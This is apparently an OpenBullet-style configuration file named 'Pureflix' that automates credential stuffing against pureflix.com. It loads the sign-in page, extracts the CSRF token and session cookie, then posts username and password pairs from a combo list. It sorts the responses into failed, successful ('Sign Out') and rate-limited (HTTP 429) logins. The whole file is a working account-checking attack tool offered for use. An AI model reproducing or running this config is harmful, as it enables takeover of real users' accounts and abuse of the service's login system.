[SETTINGS]
{
  "Name": "Pureflix",
  "SuggestedBots": 1,
  "LastModified": "2018-10-20T17:20:11.4521651+00:00",
  "AdditionalInfo": "",
  "Author": "v0ilawes",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "None",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#get REQUEST GET "https://pureflix.com/users/sign_in" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=TRUE BanOnToCheck=FALSE 
#csrf PARSE "<SOURCE>" LR "csrf-token\" content=\"" "\"" Recursive=FALSE -> VAR "csrf" "" "" 
#_esalt_session PARSE "<COOKIES(_esalt_session)>" LR "" "" Recursive=FALSE -> VAR "_esalt_session" "" "" 
#post REQUEST POST "https://pureflix.com/users/sign_in" AutoRedirect=TRUE 
  CONTENT "utf8=%E2%9C%93&authenticity_token=<csrf>&user%5Bemail%5D=<USER>&user%5Bpassword%5D=<PASS>&commit=Sign+In&user%5Bremember_me%5D=0" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Host: pureflix.com" 
  HEADER "Origin: https://pureflix.com" 
  HEADER "Referer: https://pureflix.com/users/sign_in" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "Invalid email or password." 
    KEY "Sign In" 
  KEYCHAIN Success OR 
    KEY "Sign Out" 
  KEYCHAIN Ban OR 
    KEY "<RESPONSECODE>" Contains "429" 
